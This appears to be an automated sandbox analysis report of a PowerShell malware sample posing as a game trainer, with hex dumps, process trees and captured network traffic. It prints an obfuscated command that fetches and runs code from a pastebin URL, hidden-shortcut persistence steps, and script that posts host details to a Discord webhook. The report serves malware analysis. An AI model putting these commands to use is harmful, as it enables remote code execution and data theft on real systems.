                                                                                    2024-10-15 16:08:36 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                    Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                    2024-10-15 16:08:36 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                    Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                    2024-10-15 16:08:36 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                    Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                    2024-10-15 16:08:36 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                    Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                    2024-10-15 16:08:36 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                    Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                    2024-10-15 16:08:36 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                    Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    7 | 192.168.2.7 | 49852 | 162.159.138.232 | 443 | 7548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-15 16:08:41 UTC | 311 | OUT | POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Content-Type: application/json
                                                                                    Host: discord.com
                                                                                    Content-Length: 300
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:41 UTC300OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 36 48 4b 47 5a 42 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20
                                                                                    Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 6HKGZB\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC
                                                                                    2024-10-15 16:08:42 UTC | 1259 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 15 Oct 2024 16:08:41 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 45
                                                                                    Connection: close
                                                                                    Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1729008523
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gCDeVYfG8MOB0FTSV0UaeFLhjp7PDyjKfLCFzNYSi2LWR1vejx2IA%2FAKTlNsTQA%2BFioU%2FubTwFF92vNbWie4qWxEDWEb3XGiD%2B7wz99RzoTzgAB%2FBWI1Mjq0sZc5"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Set-Cookie: __cfruid=bd1d45b24ccd9896b6e9876f8b878c373fe51f19-1729008521; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: _cfuvid=XJWZftbrpRr34.ddkGfOILwNBMWYYtEwVHX6y4K6hok-1729008521994-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d3111bddf3ea915-DFW
                                                                                    2024-10-15 16:08:42 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                    Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                    Session ID: 8
                                                                                    Source IP: 192.168.2.7
                                                                                    Source Port: 49889
                                                                                    Destination IP: 162.159.138.232
                                                                                    Destination Port: 443
                                                                                    PID: 7912
                                                                                    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-15 16:08:49 UTC | 311 | OUT | POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Content-Type: application/json
                                                                                    Host: discord.com
                                                                                    Content-Length: 300
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:49 UTC | 300 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 36 48 4b 47 5a 42 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20
                                                                                    Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 6HKGZB\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC
                                                                                    2024-10-15 16:08:49 UTC | 1253 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 15 Oct 2024 16:08:49 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 45
                                                                                    Connection: close
                                                                                    Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1729008530
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmW9a6ZzW6OZtWv4mx158Rhhm7zAR9pDtYeqopVf8louXs4yLTmZHQ3cLwwS7oNaoxDob4YR9htr06zB%2FyJ9p2MobYR1zHRVImJaIGYUR%2FPWoxMFRUpeN1GBuLjA"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Set-Cookie: __cfruid=0968388ccef6ec26a57a8a0fca07deaa13e0c211-1729008529; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: _cfuvid=Zg1_cvnTkrEezowrmdGcWuRIEpyS1qc_JH3ww76STdM-1729008529315-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d3111eb984d6be9-DFW
                                                                                    2024-10-15 16:08:49 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                    Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                    Target ID:1
                                                                                    Start time:12:08:04
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1"
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:12:08:04
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:12:08:07
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline"
                                                                                    Imagebase:0x7ff744f20000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:12:08:08
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP"
                                                                                    Imagebase:0x7ff6889b0000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:12:08:12
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Stand_Trainer_Updated.exe"
                                                                                    Imagebase:0x22d07850000
                                                                                    File size:56'320 bytes
                                                                                    MD5 hash:BECD67D75C5E7C2411E9F481086CA1E0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:7
                                                                                    Start time:12:08:12
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                    Imagebase:0x7ff7b4ee0000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:9
                                                                                    Start time:12:08:21
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\forfiles.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                    Imagebase:0x7ff7dd590000
                                                                                    File size:52'224 bytes
                                                                                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:10
                                                                                    Start time:12:08:21
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:11
                                                                                    Start time:12:08:22
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:12:08:22
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:12:08:22
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                    Imagebase:0x7ff7df7c0000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:14
                                                                                    Start time:14:08:26
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\forfiles.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                    Imagebase:0x7ff7dd590000
                                                                                    File size:52'224 bytes
                                                                                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:15
                                                                                    Start time:14:08:26
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:14:08:26
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:14:08:26
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true


                                                                                      Execution Graph

                                                                                      Execution Coverage:3.2%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:3
                                                                                      Total number of Limit Nodes:0
                                                                                      Execution graph (3 nodes): 7ffaac64aaa4 -> 7ffaac64aaad (LoadLibraryExW) -> 7ffaac64ab5d

                                                                                      Control-flow Graph

                                                                                      Function at 7ffaac63f9a6 (calls 7ffaac63fe64); rendered graph with executed/not-executed node colouring omitted.
                                                                                      Strings
                                                                                      Memory Dump Source
